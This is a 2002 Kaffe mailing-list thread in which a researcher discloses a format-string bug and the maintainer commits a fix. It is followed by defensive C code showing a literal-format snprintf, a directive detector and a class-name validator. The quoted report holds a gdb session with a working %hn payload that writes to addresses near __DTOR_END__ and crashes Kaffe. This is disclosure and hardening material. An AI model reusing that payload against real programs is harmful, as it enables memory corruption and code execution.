Kaffe Exploit is almost finished... second warning for format strings issue.

Jim Pick kaffe@rufus.w3.org
Fri, 12 Apr 2002 21:38:10 -0700


I don't think anybody behind those email addresses was paying any attention
a few months ago.  :-)

We've got a lot of work to do on the security front yet, but it would be
good if we can get rid of some of the obvious bugs as soon as they are
identified.

Cheers,

 - Jim

----- Original Message -----
From: "KF" <dotslash@snosoft.com>
To: "Jim Pick" <jim@kaffe.org>
Cc: <kaffe@rufus.w3.org>; <recon@snosoft.com>
Sent: Friday, April 12, 2002 10:05 PM
Subject: Re: Kaffe Exploit is almost finished... second warning for format strings issue.


> No problem... do you know why this went unnoticed for a while? I think I
> mailed it to every mail address I could find on your web site a few
> months back... I even tried to stuff it in your online bug form thing.
>
> My concern was for things along the line of JanOS and KaffeOS... or java
> network apps that allow clients to make class requests... servlet
> engines and things of that nature...
> -KF
>
>
> Jim Pick wrote:
>
> >Oooh, that's bad.
> >
> >I just committed a fix.  Thanks for the heads up.
> >
> >Hopefully it shouldn't hurt anyone, since people shouldn't be using Kaffe to
> >run untrusted code until we've fully implemented things like the verifier.
> >I'll cc: the list so that people know about this.
> >
> >Cheers,
> >
> > - Jim
> >
> >----- Original Message -----
> >From: "KF" <dotslash@snosoft.com>
> >To: <jim@kaffe.org>
> >Sent: Friday, April 12, 2002 8:03 AM
> >Subject: Kaffe Exploit is almost finished... second warning for format
> >strings issue.
> >
> >
> >>0804b6c8 ? __DTOR_END__
> >>[itchie@ghetto itchie]$ gdb -q /usr/local/libexec/Kaffe
> >>(gdb) r  AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>Starting program: /usr/local/libexec/Kaffe AAAABBBB`perl -e 'print
> >>"\xca\xb6\x04\x08\xc8\xb6\x04\x08"'`EEEE%49131x%26\$hn%16283x%27\$hn
> >>java.lang.NoClassDefFoundError: AAAABBBBJHEEEE
> >>        at java.lang.Class.forName(Class.java:native)
> >>        at java.lang.Class.forName(Class.java:52)
> >>
> >>Program received signal SIGSEGV, Segmentation fault.
> >>0xbfffff9a in ?? ()
> >>
> >>
> >>-KF
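The gdb session in the quoted report is a classic C format-string bug: a class name supplied by the caller reaches a printf-family function as the format argument itself, so `%x` walks the stack and `%n` writes to memory. The following is an added example written for this page; it is not Kaffe's code and not KF's exploit. The function names, the message text and the sample class names are constructed. It shows the hardened shape of the error report (literal format, untrusted data only ever consumed by `%s`) next to two defensive checks: a diagnostic that flags printf directives in a string, and an allowlist validator for JVM class names, which can never legitimately contain `%`.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Diagnostic: does the string contain printf conversion directives?
 * A '%' not followed by another '%' would be interpreted by printf()
 * if this string were ever passed as the format argument. */
int has_format_directives(const char *s)
{
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is a literal percent sign */
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Input validation: a JVM class name (dotted or slashed form) is made of
 * identifier characters only; anything else, '%' included, is rejected. */
int is_valid_class_name(const char *s)
{
    if (*s == '\0')
        return 0;
    for (const char *p = s; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '_' || c == '$' || c == '.' || c == '/'))
            return 0;
    }
    return 1;
}

/* Vulnerable shape (the bug class in the thread), shown for contrast and
 * deliberately left out of the compiled code:
 *
 *     snprintf(out, out_len, class_name);      // class_name IS the format
 *
 * Hardened shape: the format is a string literal and the untrusted name is
 * only ever consumed by %s, so any directives in it are inert.
 * Returns the length snprintf() reports. (Hypothetical function name.) */
int report_missing_class(const char *class_name, char *out, size_t out_len)
{
    return snprintf(out, out_len, "java.lang.NoClassDefFoundError: %s", class_name);
}

/* Round-trip check used by the demo: the hardened report must reproduce the
 * untrusted name byte-for-byte, directives and all. Returns 1 on success. */
int hardened_report_keeps_directives_literal(void)
{
    /* constructed sample: a "class name" carrying printf directives */
    const char *hostile = "AAAA%x%x%x";
    char buf[128];
    int n = report_missing_class(hostile, buf, sizeof buf);
    return n == 42 && strcmp(buf, "java.lang.NoClassDefFoundError: AAAA%x%x%x") == 0;
}

int main(void)
{
    /* constructed samples: one real name, one with directives, one with "%%" */
    const char *names[] = { "java.lang.String", "AAAA%x%x%x", "100%%done" };
    char buf[128];
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        report_missing_class(names[i], buf, sizeof buf);
        printf("%-18s valid=%d directives=%d -> %s\n", names[i],
               is_valid_class_name(names[i]), has_format_directives(names[i]), buf);
    }
    return 0;
}
```

The literal-format rule is the fix that actually closes the bug; the two checks are belt-and-braces for code paths where the name is logged or echoed by other means. Building with GCC's `-Wformat -Wformat-security` (or `-Werror=format-security`) reports every printf-family call whose format is not a string literal, which is the cheapest way to find the vulnerable shape across a code base the size of a JVM.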